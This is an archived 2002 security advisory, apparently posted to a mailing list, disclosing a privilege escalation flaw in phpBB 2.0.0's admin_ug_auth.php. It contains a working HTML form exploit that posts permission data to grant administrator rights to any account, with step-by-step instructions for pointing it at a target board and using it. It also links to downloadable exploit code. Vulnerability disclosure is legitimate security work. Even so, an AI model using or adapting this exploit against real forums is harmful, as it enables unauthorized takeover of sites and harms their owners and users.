('binary' encoding is not supported, stored as-is) Privilege Escalation Vulnerability In phpBB 2.0.0 ------------------------------------------------- Rootsecure.net recently found a privilege escalation vulnerability in "phpBB 2.0.0" which allows any person with a "user" level account to escalate their privileges to that of "administrator" level, and therefore gain full unrestrictive control of a forum. A coding error exists in the admin_ug_auth.php script (used to set permissions), which means that although admin rights are needed to view the page, anyone can post data back to it "no questions asked". Therefore, if you already know what kind of response the board is looking for, you can go straight ahead and tell it directly that you want to give admin rights to a specific account. Demonstration Code ------------------ <html> <head> </head> <body> <form method="post" action="http://www.domain_name/board_directory/admin/admin_ug_auth.php"> User Level: <select name="userlevel"> <option value="admin">Administrator</option> <option value="user">User</option></select> <input type="hidden" name="private[1]" value="0"> <input type="hidden" name="moderator[1]" value="0"> <input type="hidden" name="mode" value="user"> <input type="hidden" name="adv" value=""> User Number: <input type="text" name="u" size="5"> <input type="submit" name="submit" value="Submit"> </form> </body> </html> Before using the sample code you must first find out two bits of information: 1. The base directory of the board, (usually something like http://www.mydomain.com/phpBB2), which is found by taking off index.php from the main page URL. 2. The user number of the account you wish to give admin. To do this go to the forums member list page, click your username, then note down the number shown at the right end of the URL you are now at. (if no users have been deleted from the board, then the number next to your username on the members list page under the "#" column will also be your true user number). When you have all the information, ensure you log out from the board. (otherwise, you will get a permissions error later on). Now edit the form action in the demonstration code above to be the full location of the boards base directory plus the location of the admin script. Usually, this is in a subdirectory from the base directory called /admin/. Your result should look something like this: action=http://www.domain_name/board_directory/admin/admin_ug_auth.php. Save the changes to your page when you are done. Next just call it in a local browser window, typing the user number you obtained into the user number box on screen, and hit submit. On your next login, you will have admin rights. Note: phpBB versions above 2.0.0 are not vulnerable. Additional information along with downloadable versions of the exploit code in the form of a static HTML page, and Perl script can be found at http://www.rootsecure.net?menuitem=exploit_code ______________________________ http://www.rootsecure.net/
This archive was generated by hypermail 2b30 : Mon Oct 28 2002 - 15:05:36 PST